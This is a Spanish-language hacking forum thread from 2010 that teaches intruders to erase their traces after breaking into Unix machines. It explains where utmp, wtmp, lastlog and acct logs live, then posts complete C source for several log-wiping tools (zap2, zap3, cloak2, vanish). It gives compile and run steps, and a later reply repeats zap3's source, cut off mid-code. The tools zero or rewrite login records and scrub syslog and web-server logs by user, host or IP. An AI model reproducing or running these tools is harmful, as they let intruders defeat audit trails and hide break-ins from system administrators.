comment
IRC Chat
play_arrow
Este sitio utiliza cookies propias y de terceros. Si continúa navegando consideramos que acepta el uso de cookies. OK Más Información.

Borrando Huellas [Zappering o Cloakering]

  • 11 Respuestas
  • 5399 Vistas

0 Usuarios y 2 Visitantes están viendo este tema.

Conectado ANTRAX

  • *
  • Administrator
  • Mensajes: 5388
  • Actividad:
    36.67%
  • Reputación 31
  • ANTRAX
    • Ver Perfil
    • Underc0de
    • Email
  • Skype: underc0de.org
  • Twitter: @Underc0de
« en: Febrero 19, 2010, 07:59:09 am »
Esto lo vamos a hacer con un zapper , un zapper es un programa que al ejecutarlo en la maquina remota limpia el log que queda guandado con todo lo que hicimos en la maquina victima.

Si no limpias la mugre que dejas estas cagado, ya ke si el root revisa los logs vera tu IP y todo lo ke has hecho. Si te agarran despues no me digas que no avise.

Pero donde esta el probema de esto, y bueno les comento que el problema de esto es que para borrar lo que hiciste tenes que ser roort.

Los logs mas importantes son:

_ UTMP - Indika quien esta konectado en cada momento.

_ WTMP - Indica todas las entradas y salidas de la maquina victima indicando el tty y el host.

_ LASTLOG - Guarda un log indicando el momento exacto en el ce se konekto el usuario por ultima vez.

_ ACCT - Guarda todos los comandos ejekutados por los usuarios (aunke sin argumentos) y como los ponemos.

Me llevo casi 3 horas averiguar esto asi que me imagino que algun dia lo van a utilizar, si es que entran en algun ordenador alguna vez.

Estos logs estan ubicados en los siguientes directorios.

_ UTMP : /etc o /var/adm o /usr/adm o /usr/var/adm o /var/log

_ WTMP : /etc o /var/adm o /usr/adm o /usr/var/adm o /var/log

_ LASTLOG : /usr/var/adm o /usr/adm o /var/adm o /var/log

_ ACCT : /var/adm/acct (en algunos sistemas se puede llamar pacct)

Esto varia de sistema en sistema.

Los zappers lo que hacen la mayoria es borrar el log acct , de esta forma estamos salvados de que nos agarren ya que sabran que estubimos dentro pero no pueden saber que hicimos. Por eso es bueno acompañarlo con algun metodo de anonimato que ya sabran.

Lo que voy a enseñar a usar es el zap2 un zapper que es muy fasil de detectar si es que se quiere, lo que hace este no borrar los logs sino dejarlos en 0 , y tampoco borra el acct pero tambien lo deja en 0 asi que no tendremos problemas graves, siempre y cuando no se manden una cagada grosa en la maquina y le den ganas al admin de saber quien fue. Le va a costar pero no va a ser tan fasil como dejarle el numero de documento en el log.

En este tuto vamos a matar 2 pajaros de un tiro. Uno es aprender a compilar exploits y otro aprender a ejecutarlos. Obvio que este es de uso local, es decir hay que ejecutarlo desde la shell del sistema que queremos limpiar.

Pasamos a crear el archivo zap2.c de esta forma.

[root@localhost phantomlord]# cat > zap2.c

------------------------copiamos el code-------------------------

#include <sys/types.h>

#include <stdio.h>

#include <unistd.h>

#include <sys/file.h>

#include <fcntl.h>

#include <utmp.h>

#include <pwd.h>

#include <lastlog.h>

#define WTMP_NAME "/usr/adm/wtmp"

#define UTMP_NAME "/etc/utmp"

#define LASTLOG_NAME "/usr/adm/lastlog"

int f;

void kill_utmp(who)

char *who;

{

struct utmp utmp_ent;

if ((f=open(UTMP_NAME,O_RDWR))>=0) {

while(read (f, &utmp_ent, sizeof (utmp_ent))> 0 )

if (!strncmp(utmp_ent.ut_name,who,strlen(who))) {

bzero((char *)&utmp_ent,sizeof( utmp_ent ));

lseek (f, -(sizeof (utmp_ent)), SEEK_CUR);

write (f, &utmp_ent, sizeof (utmp_ent));

}

close(f);

}

}

void kill_wtmp(who)

char *who;

{

struct utmp utmp_ent;

long pos;

pos = 1L;

if ((f=open(WTMP_NAME,O_RDWR))>=0) {

while(pos != -1L) {

lseek(f,-(long)( (sizeof(struct utmp)) * pos),L_XTND);

if (read (f, &utmp_ent, sizeof (struct utmp))<0) {

pos = -1L;

} else {

if (!strncmp(utmp_ent.ut_name,who,strlen(who))) {

bzero((char *)&utmp_ent,sizeof(struct utmp ));

lseek(f,-( (sizeof(struct utmp)) * pos),L_XTND);

write (f, &utmp_ent, sizeof (utmp_ent));

pos = -1L;

} else pos += 1L;

}

}

close(f);

}

}

void kill_lastlog(who)

char *who;

{

struct passwd *pwd;

struct lastlog newll;

if ((pwd=getpwnam(who))!=NULL) {

if ((f=open(LASTLOG_NAME, O_RDWR)) >= 0) {

lseek(f, (long)pwd->pw_uid * sizeof (struct lastlog), 0);

bzero((char *)&newll,sizeof( newll ));

write(f, (char *)&newll, sizeof( newll ));

close(f);

}

} else printf("%s: ?\n",who);

}

main(argc,argv)

int argc;

char *argv[];

{

if (argc==2) {

kill_lastlog(argv[1]);

kill_wtmp(argv[1]);

kill_utmp(argv[1]);

printf("Zap2!\n");

} else


printf("Listo...ya limpie la mie**a...hdl rulez!\n");

}

--------------------------------------termino zap2-------------------

apretamos ctrl +z para terminar

[15]+ Stopped cat >zap2.c

[root@localhost phantomlord]#

Ahora lo compilamos

[root@localhost phantomlord]# gcc zap2.c -o zap2

El archivo compilado (programa) se va a llamar zap2

y ahora lo ejecutamos de esta manera.

[root@localhost phantomlord]# ./zap2

Listo...ya limpie la mie**a...hdl rulez!

[root@localhost phantomlord]#

Como ven nos avisa si funciono o no quiero aclarar que se puede usar de las siguientes formas.

[root@localhost phantomlord]# ./zap2 nombreusuario

o simplemente

[root@localhost phantomlord]# ./zap2

Que borrara los logs del usuario que estemos usando en ese momento.


         ANTRAX


Conectado ANTRAX

  • *
  • Administrator
  • Mensajes: 5388
  • Actividad:
    36.67%
  • Reputación 31
  • ANTRAX
    • Ver Perfil
    • Underc0de
    • Email
  • Skype: underc0de.org
  • Twitter: @Underc0de
« Respuesta #1 en: Febrero 19, 2010, 08:11:21 am »
Aqui mas zappers

zap3.c
Código: No tienes permisos para ver links. Registrate o Entra con tu cuenta
/*########################################################################
*####  Zap3.c cleans WTMP, UTMP, lastlog, messages, secure, ##############
*####  xferlog, httpd.access_log, httpd.error_log.          ##############
*####  Check your log file and edit the source accordingly. ##############
 ####      Tested in Mandrake 7.2 and 8.0                   ##############
*#########################################################################
*#### This program is for educational purposes only         ##############
*####     I'm not responsible any  damages of this program  ##############
*####            Use it with your own risk                  ##############
*#########################################################################
*####  I change the user based cleaning method              ############## 
*####    to host based method. Also zap2.c cleans           ##############
*####        last entry of wtmp file,i change               ##############
*####           this to clean all entries.                  ##############
*#########################################################################
       
               Copyright (c) darkloop .  All rights reserved. 
        This software is licensed pursuant to the GNU General Public License
        version 2 or later versions [or GNU Lesser General Public License],
a copy of which may be viewed at www.gnu.org/copyleft/gpl.html.

*#########################################################################
*####   Please inform me about your comments.               ##############
*####   I'm new to c programmin so feel free to flame :)    ##############
*####            dark_loop@linuxmail.org                     ############## 
*####            www.solitude2000.f2s.com                   ##############
*####              15.10.2001                             ##############
*#########################################################################
 
           



*/
#include <sys/types.h>
#include <stdio.h>
#include <unistd.h>
#include <sys/file.h>
#include <fcntl.h>
#include <utmp.h>
#include <pwd.h>
#include <lastlog.h>
#include <string.h>
#define WTMP_NAME       "/var/log/wtmp"     
#define UTMP_NAME       "/var/run/utmp"     
#define LASTLOG_NAME    "/var/log/lastlog"
#define MESSAGES        "/var/log/messages"
#define SECURE          "/var/log/secure"
#define SYSLOG          "/var/log/syslog"
#define XFERLOG         "/var/log/xferlog"
#define AUTH            "/var/log/auth.log"
#define HTTPDA          "/var/log/httpd/access_log"
#define HTTPDE          "/var/log/httpd/error_log"         
#define MAX           1024*5120
#define MIN           1024             
void clean_logs(char *host,char *fake);    
void clean_utmp(char *host,char *fake);
void clean_wtmp(char *host,char *fake);
void clean_lastlog(char *host,char *fake);
int pos(char *source,char *pattern);
void str_replace(char *source,char *pattern,char *replace);

main(int argc,char **argv)
{
    time_t t1,t2;
    if (argc<2) {
           printf("missing argument\n");
     printf("usage :./zap <ip>\n");
           exit(1);
    } else {
     time(&t1);
             clean_utmp(argv[1],argv[2]);
             clean_wtmp(argv[1],argv[2]);
             clean_lastlog(argv[1],argv[2]);
     clean_logs(argv[1],argv[2]);
     time(&t2);
     printf("the process time is %d ms\n",t2-t1);
    }
}

void clean_utmp(char *host,char *fake)
{
     int f;
     struct utmp utmp_ent;
     if ((f=open(UTMP_NAME,O_RDWR))<0) {
     perror("open");
     close(f);
        }
     while(read (f, &utmp_ent, sizeof (utmp_ent))> 0 )
       if (!strncmp(utmp_ent.ut_host,host,strlen(host))) {
       if(fake) {
       memcpy(utmp_ent.ut_host,fake,sizeof(utmp_ent.ut_host));
       }else {
                 memset(&utmp_ent,0,sizeof( utmp_ent ));
}
                 lseek (f, -(sizeof (utmp_ent)), SEEK_CUR);
                 write (f, &utmp_ent, sizeof (utmp_ent));
            }
     close(f);
     printf("\tcleaning utmp file finished\n\t");
 
}
 
void clean_wtmp(char *host,char *fake)
{
    struct utmp utmp_ent;
    int f;
        if ((f=open(WTMP_NAME,O_RDWR))<0) {
perror("open");
close(f);
         }     
     while(read (f, &utmp_ent, sizeof (struct utmp))>0) {
          if (!strncmp(utmp_ent.ut_host,host,strlen(host))) {
  if(fake) {
  memcpy(utmp_ent.ut_host,fake,sizeof(utmp_ent.ut_host));
  }else {
               memset(&utmp_ent,0,sizeof(struct utmp ));
  }
               lseek(f,-(sizeof(struct utmp)),SEEK_CUR);
               write (f, &utmp_ent, sizeof( utmp_ent ));
            }
        }
     close(f);
     printf("cleaning wtmp finished\n\t");
}
void clean_lastlog(char *host,char *fake)
{   
    int f;
    struct lastlog newll;
        if ((f=open(LASTLOG_NAME, O_RDWR)) < 0) {
perror("open");
close(f);
         } else {
               while(read(f,&newll,sizeof(struct lastlog)) > 0 ) {
                 if(!strncmp(newll.ll_host,host,strlen(host))) {
if(fake) {
memcpy(newll.ll_host,fake,sizeof(newll.ll_host));
}else {
                   memset(&newll,0,sizeof( newll ));
}
                   lseek(f, -( sizeof (struct lastlog)),SEEK_CUR);
                   write(f,&newll, sizeof( newll ));
               }
          }
        close(f);
      }
    printf("cleaning lastlog finished\n\t");
}
void clean_logs(char *host,char *fake)
{
int i;
char buffer[MIN],buff[MAX];
FILE *fin,*fout;
char *logs[] = {MESSAGES, SECURE,SYSLOG, XFERLOG, AUTH, HTTPDA, HTTPDE} ;
        char *modlogs[] = {"modMESSAGES", "modSECURE","modSYSLOG", "modXFERLOG",
"modAUTH","modHTTPDA","modHTTPDE"} ;

      i=0;
while(i<7) {
printf("cleaning %s\n\t",logs[i]);
                strcpy(buff,"");
if((fin=fopen(logs[i],"r"))==NULL
|| (fout=fopen(modlogs[i],"w"))==NULL) {
perror("fopen");
fclose(fin);
        i++;
}
       
while(fgets(buffer,MIN,fin) !=NULL) {
   if(fake) {
                      if (strstr(buffer,host) ) {
                 str_replace(buffer,host,fake);
                 fputs(buffer,fout);
                                      }else
      fputs(buffer,fout);
   }else {
   if(!strstr(buffer,host))
   fputs(buffer,fout);
   }
}
    fclose(fin);
    fclose(fout);
            if((fout=fopen(logs[i],"w"))==NULL
                   || (fin=fopen(modlogs[i],"r"))==NULL) {
    perror("fopen");
    fclose(fout);
    }
    while((fgets(buffer,MAX,fin)) !=NULL) {
    fputs(buffer,fout);
    }
            fclose(fin);           
            fclose(fout);
    unlink(modlogs[i]);
            i++;
}
printf("cleaning logs file finished\n\t");
}
void str_replace(char *source,char *pattern,char *replace)
{
      char buffer[MIN];
      char part[MIN];
      int n;
      while((n=pos(source,pattern))>=0) {
                  strcpy(buffer,&source[n+strlen(pattern)]);
                  strcpy(&source[n],replace);
                  strncpy(part,source,n+strlen(replace));
                  part[n+strlen(replace)]='\0';
                  strcat(part,buffer);
                  strcpy(source,part);
                  n=pos(source,pattern);
             } 
}
int pos(char *source,char *pattern)
{
    char substring[MIN];
    int i=0,found=0,position;
    int pattern_len=strlen(pattern);
    while(!found && i<= strlen(source) - pattern_len) {
         strncpy(substring,&source[i],pattern_len);
         substring[pattern_len]='\0';
         if(strcmp(substring,pattern)==0)
              found=1;
         else
             ++i;
        }
     if(found)
           position=i;
      else
           position=-1;
      return(position);
}

------------------------------------------------------------------------------------------------------

cloak2.c     < Muy bueno y famoso

Código: No tienes permisos para ver links. Registrate o Entra con tu cuenta
/*
 *      C L O A K
 *
 *      Wrap yourself in a cloak of darkness (heh heh heh).
 *
 *      Michael S. Baldwin,  Matthew Diaz  1982
 *
 *      Marcus J. Ranum - 1983 - complete re-write and munging
 *      added more options, and all kinds of evil - including the
 *      ability to vanish from wtmp and acct as well as utmp. Added more
 *      error checking and useful command syntax. Now you can attribute
 *      all *YOUR* CPU usage to others when playing hack !!!
 *
 */
 
 
#include <stdio.h>
#include <sys/types.h>
#include <utmp.h>
#include <pwd.h>
#include <lastlog.h>
#include <sys/file.h>
#include <sys/acct.h>
 
/* set these guys. If you're sysV a port should be easy */
#define UTMP    "/etc/utmp"
#define WTMP    "/usr/adm/wtmp"
#define LAST    "/usr/adm/lastlog"
#define ACCT    "/usr/adm/acct"
 
 
main(ac,av)
int     ac;
char    *av[];
{
        char    *tp     = "";
        char    *un     = "";
        char    *hn     = "";
        char    *pn     = "";
        long    newt    = 0L;
        int     wflg    = 0;
        int     aflg    = 0;
        int     refs    = 1;
        int     x;              /* klunch */
        char    *p;
        extern  char    *index();
        extern  time_t  time();
 
        for(x = 1; x < ac; x++) {
                if(av[x][0] == '-')
                        switch(av[x][1]) {
case 'u':       /* username to be :-) */
                                        if((x + 1) < ac)
                                                un = av[++x];
                                        break;
 
      case 't':       /* tty slot to be on :-) */
                                        if((x + 1) < ac)
                                                tp = av[++x];
                                        break;
 
      case 'h':       /* host name to be on :-) */
                                        if((x + 1) < ac)
                                                hn = av[++x];
                                        break;
 
      case 'r':       /* # of refs to zap :-) */
                                        if((x + 1) < ac)
                                                refs = atoi(av[++x]);
                                        break;
 
      case 's':
                                        execl("/bin/sh","sh",0);
                                        perror("exec");
                                        exit(1);
 
      case 'w':       /* vanish from wtmp, too */
                                        wflg++;
                                        break;
 
      case 'a':       /* vanish from acct, too */
                                        aflg++;
                                        break;
 
      case 'p':       /* specific program for acct */
                                        if((x + 1) < ac)
                                                pn = av[++x];
                                        break;
 
      case 'l':       /* log on time */
                                        if((x + 1) >= ac)
                                                break;
                                        newt = atoi(p = av[++x]);
                                        if(p = index(p,':'))  {
                                                newt *= 60;
                                                newt += ((newt > 0) ? 1 : -1) *
atoi(++p);
      }
                                        newt *= 60;
                                        newt += time((long *)0L);
                                        break;
 
      default:
                                        exit(usage());
      }
 
      }
 
        if(wflg && wtmpzap(tp,un,hn,newt,refs))
                perror(av[0]);
 
        if(aflg && acctzap(un,pn))
                perror(av[0]);
 
        if(utmpzap(tp,un,hn,newt)) {
                perror(av[0]);
                exit(1);
      }
 
        if(lastzap(tp,un,hn,newt)) {
                perror(av[0]);
                exit(1);
      }
 
        exit(0);
      }
 
utmpzap(tt,un,hn,tim)
char    *tt;
char    *un;
char    *hn;
long    tim;
{
        int     fd;
        int     slot;
        struct  utmp    ubuf;
        extern  time_t  time();
        extern  char    *strncpy();
        extern  long    lseek();
 
        if((slot = ttyslot()) == 0) {
                (void)fprintf(stderr,"No tty slot");
                return(-1);
      }
 
        if((fd = open(UTMP,O_RDWR)) == -1 )
                return(-1);
 
        if(lseek(fd,(long)(slot * sizeof(ubuf)),0) < 0) {
                (void)close(fd);
                return(-1);
      }
 
        if(read(fd,(char *)&ubuf,sizeof(ubuf)) != sizeof(ubuf)) {
                (void)close(fd);
                return(-1);
      }
 
        if(tim)
                ubuf.ut_time = tim;
        else
                ubuf.ut_time = time((long *)0L);
 
        (void)strncpy(ubuf.ut_name,un,sizeof(ubuf.ut_name));
 
        if(!tt[0] == '\0')
                (void)strncpy(ubuf.ut_line,tt,sizeof(ubuf.ut_line));
                (void)strncpy(ubuf.ut_host,hn,sizeof(ubuf.ut_host));
 
        if(lseek(fd,(long)(-sizeof(ubuf)), 1) < 0) {
                (void)close(fd);
                return(-1);
      }
 
        if(write(fd,(char *)&ubuf,sizeof(ubuf)) != sizeof(ubuf)) {
                (void)close(fd);
                return(-1);
      }
 
        return(close(fd));
      }
 
wtmpzap(tt,un,hn,tim,refs)
char    *tt;
char    *un;
char    *hn;
long    tim;
int     refs;
{
        int     fd;
        char    *p;
        char    tbuf[40];
        struct  utmp    ubuf;
        extern  char    *strncpy();
        extern  char    *strcpy();
        extern  char    *rindex();
        extern  char    *ttyname();
        extern  long    lseek();
        extern  time_t  time();
 
        if((p = ttyname(0)) != NULL)
                (void)strcpy(tbuf,p);
        else
                return(0);
 
        /* figure out our device name */
        p = rindex(tbuf,'/');
        if(p == NULL)
                p = tbuf;
        else
                p++;
 
 
        if((fd = open(WTMP,O_RDWR)) == -1 )
                return(-1);
 
        if(lseek(fd,0L,2) < 0)
                return(-1);
 
 
        /* this is gross, but I haven't a better idea how it can */
        /* be done - so who cares ? */
 
        while(refs) {
                if((lseek(fd,(long)(-sizeof(ubuf)),1)) < 0) {
                        (void)close(fd);
                        return(0);
      }
 
                if(read(fd,(char *)&ubuf,sizeof(ubuf)) != sizeof(ubuf)) {
                        (void)close(fd);
                        return(0);
      }
                if(!strcmp(p,ubuf.ut_line)) {
                        if(tim)
                                ubuf.ut_time = tim;
                        else
                                ubuf.ut_time = time((long *)0L);
 
                        (void)strncpy(ubuf.ut_name,un,sizeof(ubuf.ut_name));
                        (void)strncpy(ubuf.ut_host,hn,sizeof(ubuf.ut_host));
 
                        if(!tt[0] == '\0')
 
(void)strncpy(ubuf.ut_line,tt,sizeof(ubuf.ut_line));
 
                        if(lseek(fd,(long)(-sizeof(ubuf)),1) < 0) {
                                (void)close(fd);
                                return(0);
      }
 
                        if(write(fd,(char *)&ubuf,sizeof(ubuf)) !=
sizeof(ubuf)){
                                (void)close(fd);
                                return(0);
      }
 
                        if(lseek(fd,(long)(-sizeof(ubuf)),1) < 0) {
                                (void)close(fd);
                                return(0);
      }
 
                        refs--;
   }
 
                if(lseek(fd,(long)(-sizeof(ubuf)),1) < 0) {
                        (void)close(fd);
                        return(0);
   }
 
   }
 
        return(close(fd));
   }
 
acctzap(un,pn)
char    *un;
char    *pn;
{
        int     fd;
        int     faku =0;
        int     realu;
        struct  acct    actbuf;
        struct  passwd  *pwt;
        extern  struct  passwd  *getpwnam();
 
        if((fd = open(ACCT,O_RDWR)) == -1 )
                return(-1);
 
        realu = getuid();
 
        if(un[0] != '\0' && ((pwt = getpwnam(un)) != NULL))
                faku = pwt->pw_uid;
 
        while(1) {
                if(read(fd,(char *)&actbuf,sizeof(actbuf)) != sizeof(actbuf)) {
                        (void)close(fd);
                        return(0);
      }
 
                if(realu == actbuf.ac_uid) {
 
                        /* only zap a specific program to user */
                        if(pn[0] != '\0' && strcmp(pn,actbuf.ac_comm))
                                continue;
 
                        actbuf.ac_uid = faku;
                        actbuf.ac_flag &= ~ASU;
                        if(lseek(fd,(long)(-sizeof(actbuf)),1) < 0) {
                                (void)close(fd);
                                return(0);
      }
 
                        if(write(fd,(char *)&actbuf,sizeof(actbuf)) !=
sizeof(actbuf)){
                                (void)close(fd);
                                return(0);
      }
      }
      }
      }
 
usage()
{
#ifdef USAGE
        (void)fprintf(stderr,"usage: cloak <options>\n");
        (void)fprintf(stderr,"options are:\t-l <+->hh:mm (login time)\n");
        (void)fprintf(stderr,"\t\t-u username\t\t\t-t ttyname\n");
        (void)fprintf(stderr,"\t\t-w (clobber wtmp)\t\t-r #of refs to
clobber\n");
        (void)fprintf(stderr,"\t\t-h host\t\t-a (clobber accounting)\n");
        (void)fprintf(stderr,"\t\t-p program (attribute only program to
acct)\n");
        (void)fprintf(stderr,"(no args causes a simple vanishing act)\n");
#endif
        return(1);
      }
 
lastzap(tt,un,hn,tim)
char    *tt;
char    *un;
char    *hn;
long    tim;
{
        int     fd;
        int     uid;
        struct  lastlog lbuf;
        extern  time_t  time();
        extern  char    *strncpy();
        extern  long    lseek();
 
        uid = getuid();
 
        if((fd = open(LAST,O_RDWR)) == -1 )
                return(-1);
 
        if(lseek(fd,(long)(uid * sizeof(lbuf)),0) < 0) {
                (void)close(fd);
                return(-1);
      }
 
        if(read(fd,(char *)&lbuf,sizeof(lbuf)) != sizeof(lbuf)) {
                (void)close(fd);
                return(-1);
      }
 
        if(tim)
                lbuf.ll_time = tim;
        else
                lbuf.ll_time = time((long *)0L);
 
        if(!tt[0] == '\0')
                (void)strncpy(lbuf.ll_line,tt,sizeof(lbuf.ll_line));
        (void)strncpy(lbuf.ll_host,hn,sizeof(lbuf.ll_host));
 
        if(lseek(fd,(long)(-sizeof(lbuf)), 1) < 0) {
                (void)close(fd);
                return(-1);
      }
 
        if(write(fd,(char *)&lbuf,sizeof(lbuf)) != sizeof(lbuf)) {
                (void)close(fd);
                return(-1);
      }
 
        return(close(fd));
      }

--------------------------------------------------------------------------------------------------

vanish.c

Código: No tienes permisos para ver links. Registrate o Entra con tu cuenta
/***************************************************************************
                          vanish.c  -  description                           
                            -------------------                           
                  begin                : Wed Feb 2 2000                       
                  copyright            : (C) 2000 by Neo the Hacker     
                  email                : --------------------------     
                             
***************************************************************************/

/***************************************************************************
* Vanish.c cleans WTMP, UTMP, lastlog, messages, secure, xferlog, maillog, *
* warn, mail, httpd.access_log, httpd.error_log. Use your brain, check your*
* logs and edit accordingly !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!*
****************************************************************************
* Warning!! This programm is for educational purpouse only! I am not       *
* responsible to anything you do with this !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!*
****************************************************************************
* Code written for Unix like systems! Tested on SuSE-Linux 6.2 !           *
* Compile like: gcc vanish.c -o vanish                                     *
***************************************************************************/


#include <stdio.h>
#include <fcntl.h>
#include <utmp.h>
#include <sys/types.h>
#include <unistd.h>
#include <lastlog.h>
#include <pwd.h>

#define UTMP            "/var/run/utmp"
#define WTMP            "/var/log/wtmp"
#define LASTLOG         "/var/log/lastlog"
#define MESSAGES        "/var/log/messages"
#define SECURE          "/var/log/secure"
#define XFERLOG         "/var/log/xferlog"
#define MAILLOG         "/var/log/maillog"     
#define WARN            "/var/log/warn"
#define MAIL            "/var/log/mail"
#define HTTPDA          "/var/log/httpd.access_log"
#define HTTPDE          "/var/log/httpd.error_log"
#define MAXBUFF 8*1024



int main(int argc, char *argv[])
{
struct utmp ut ;
struct lastlog ll ;
struct passwd *pass ;
int i, size, fin, fout ;
FILE *pfile;
FILE *pfile2;
char *varlogs[] = {MESSAGES, SECURE, XFERLOG, MAILLOG, WARN, MAIL, HTTPDA,HTTPDE} ;
char *newlogs[] = {"messages.hm", "secure.hm","xferlog.hm","maillog.hm","warn.hm", "mail.hm", "httpda.hm", "httpde.hm"} ; 
char buffer[MAXBUFF] ;

char user[10] ;
char host[100] ;
char host_ip[17] ;


/*Usage of the programm*/
if (argc!=4)
{
   printf ("\n\n");
   fprintf(stderr, "Vanish by Neo the Hacker\n");
   fprintf(stderr, "Usage: %s <user> <host> <IP>\n\n",argv[0]) ;
   exit () ;
}

/***************************
* OK Let's start with UTMP *
***************************/
size = sizeof(ut) ;
strcpy (user, argv[1]) ;
fin = open (UTMP, O_RDWR) ;
if (fin < 0)
{
fprintf(stderr, "\nFucking shit!! Utmp permission denied.Getting outta here!!\n"); 
close (fin) ;
exit();
}
else
{
while (read (fin, &ut, size) == size) {
       if (!strncmp(ut.ut_user, user, strlen(user))) {
                   memset(&ut, 0, size);
                   lseek(fin, -1*size, SEEK_CUR);
                   write (fin, &ut, size);
               }
        }
        close (fin);
        printf("\nutmp target processed.");
}
/***************************
* OK Let's go on with WTMP *
***************************/
strcpy (host, argv[2]) ;
  strcpy(host_ip, argv[3]) ;

fin = open(WTMP, O_RDONLY) ;
if (fin < 0) {
fprintf(stderr, "\nFucking shit!! Wtmp permission denied.Getting outta here.\n") ;                              
   close (fin) ; exit () ;
}
fout = open("wtmp.hm", O_WRONLY|O_CREAT) ;
if (fout < 0) {
fprintf(stderr, "\nDamn! Problems targeting wtmp. Getting outta here.\n") ;
close (fout) ;
exit () ;
}
else {
while (read (fin, &ut, size) == size) {
if ( (!strcmp(ut.ut_user, user)) || (!strncmp(ut.ut_host, host, strlen(host))) ) {
  /* let it go into oblivion */  ;
}
        else write (fout, &ut, size) ; }
close (fin) ;
close (fout) ;
if ((system("/bin/mv wtmp.hm /var/log/wtmp") < 0) &&
    (system("/bin/mv wtmp.hm /var/log/wtmp") == 127)) {
fprintf(stderr, "\nAch. Couldn't replace %s .", WTMP) ;
}
                system("/bin/chmod 644 /var/log/wtmp") ;
printf("\nwtmp target processed.") ;
}
/***************************
* OK Let's look at LASTLOG *
***************************/
size = sizeof(ll) ;
fin = open(LASTLOG, O_RDWR) ;
if (fin < 0) {
fprintf(stderr, "\nFucking shit!! Lastlog permission denied.Getting outta here.\n") ;
                close (fin) ;
exit () ;
}
else {
pass = getpwnam(user) ;
lseek(fin, size*pass->pw_uid, SEEK_SET) ;
read(fin, &ll, size) ;
ll.ll_time = 0 ;
strncpy (ll.ll_line, "      ", 5) ;
strcpy (ll.ll_host, " ") ;
lseek(fin, size*pass->pw_uid, SEEK_SET) ;
write(fin, &ll, size) ;
close (fin) ;
printf("\nlastlog target processed.\n") ;
}

/**************************
* OK moving to /var ....  *
**************************/
i=0;
while (i<8) {
printf("Processing %s\t", varlogs[i]) ;
pfile = fopen (varlogs[i],"r");
if (!pfile)
{
   printf("Couldn't open %s\n\n", varlogs[i]);
   i++;
   continue ;
}


pfile2 = fopen (newlogs[i],"w");
if (!pfile2)
{
  printf("Couldn't create backup file! You have to have write permission to the folder!! %s \n\n", newlogs[i]);   
  i++;   
  continue;
}
else {
      while (fgets(buffer, MAXBUFF, pfile) != NULL) {
      if ((!strstr(buffer, user)) && (!strstr(buffer, host))&&(!strstr(buffer, host_ip)))  {
fputs(buffer,pfile2) ;  } }
}
fclose (pfile);
fclose (pfile2);
printf ("                   DONE.\n");
i++;
}
printf ("\n\n");
system ("mv messages.hm /var/log/messages");
system ("mv secure.hm /var/log/secure");
system ("mv xferlog.hm /var/log/xferlog");
system ("mv maillog.hm /var/log/maillog");
system ("mv warn.hm /var/log/warn");
system ("mv mail.hm /var/log/mail");
system ("mv httpda.hm /var/log/httpd.access_log");
system ("mv httpde.hm /var/log/httpd.error_log");
printf ("\n\n");
printf ("V_A_N_I_S_H_E_D_!\n");
printf ("Your tracks have been removed\n");
printf ("Exiting programm !!\n\n");
exit();
}


snake875

  • *
  • Visitante
« Respuesta #2 en: Marzo 04, 2010, 07:22:36 am »
tienes algunos para sistemas operativos windows ???

Conectado ANTRAX

  • *
  • Administrator
  • Mensajes: 5388
  • Actividad:
    36.67%
  • Reputación 31
  • ANTRAX
    • Ver Perfil
    • Underc0de
    • Email
  • Skype: underc0de.org
  • Twitter: @Underc0de
« Respuesta #3 en: Marzo 05, 2010, 09:38:15 am »
En windows se puede hacer uno en Batch, voy a ver si me hecho un tiempito para codear uno


Desconectado m3x1c0h4ck

  • *
  • Underc0der
  • Mensajes: 79
  • Actividad:
    0%
  • Reputación 0
  • i like girls
    • Ver Perfil
    • Email
  • Skype: m3x1c0h4ck
« Respuesta #4 en: Marzo 25, 2010, 05:38:15 pm »
exelente info  :D

grax ANTRAX

saludos

m3x1c0h4ck

Desconectado ..::key-m0rt::..

  • *
  • Underc0der
  • Mensajes: 35
  • Actividad:
    0%
  • Reputación 0
  • MaEsTRO DeL arTE dE hAblARmE cOn Lo quE DesCRIBO
    • Ver Perfil
« Respuesta #5 en: Marzo 25, 2010, 05:44:15 pm »
perfecto ,  te quedo bastante completo , gracias por la infromacion

Desconectado syncrack

  • *
  • Underc0der
  • Mensajes: 1
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
    • Email
« Respuesta #6 en: Marzo 27, 2010, 09:39:40 pm »
logcleaner-0.3.c

Código: No tienes permisos para ver links. Registrate o Entra con tu cuenta
/*########################################################################
*####  Zap3.c cleans WTMP, UTMP, lastlog, messages, secure, ##############
*####  xferlog, httpd.access_log, httpd.error_log.          ##############
*####  Check your log file and edit the source accordingly. ##############
 ####      Tested in Mandrake 7.2 and 8.0                   ##############
*#########################################################################
*#### This program is for educational purposes only         ##############
*####     I'm not responsible any  damages of this program  ##############
*####            Use it with your own risk                  ##############
*#########################################################################
*####  I change the user based cleaning method              ############## 
*####    to host based method. Also zap2.c cleans           ##############
*####        last entry of wtmp file,i change               ##############
*####           this to clean all entries.                  ##############
*#########################################################################
       
               Copyright (c) darkloop .  All rights reserved. 
        This software is licensed pursuant to the GNU General Public License
        version 2 or later versions [or GNU Lesser General Public License],
a copy of which may be viewed at www.gnu.org/copyleft/gpl.html.

*#########################################################################
*####   Please inform me about your comments.               ##############
*####   I'm new to c programmin so feel free to flame :)    ##############
*####            dark_loop@linuxmail.org                     ############## 
*####            www.solitude2000.f2s.com                   ##############
*####              15.10.2001                             ##############
*#########################################################################
 
           



*/
#include <sys/types.h>
#include <stdio.h>
#include <unistd.h>
#include <sys/file.h>
#include <fcntl.h>
#include <utmp.h>
#include <pwd.h>
#include <lastlog.h>
#include <string.h>
#define WTMP_NAME       "/var/log/wtmp"     
#define UTMP_NAME       "/var/run/utmp"     
#define LASTLOG_NAME    "/var/log/lastlog"
#define MESSAGES        "/var/log/messages"
#define SECURE          "/var/log/secure"
#define SYSLOG          "/var/log/syslog"
#define XFERLOG         "/var/log/xferlog"
#define AUTH            "/var/log/auth.log"
#define HTTPDA          "/var/log/httpd/access_log"
#define HTTPDE          "/var/log/httpd/error_log"         
#define MAX           1024*5120
#define MIN           1024             
void clean_logs(char *host,char *fake);    
void clean_utmp(char *host,char *fake);
void clean_wtmp(char *host,char *fake);
void clean_lastlog(char *host,char *fake);
int pos(char *source,char *pattern);
void str_replace(char *source,char *pattern,char *replace);

main(int argc,char **argv)
{
    time_t t1,t2;
    if (argc<2) {
           printf("missing argument\n");
     printf("usage :./zap <ip>\n");
           exit(1);
    } else {
     time(&t1);
             clean_utmp(argv[1],argv[2]);
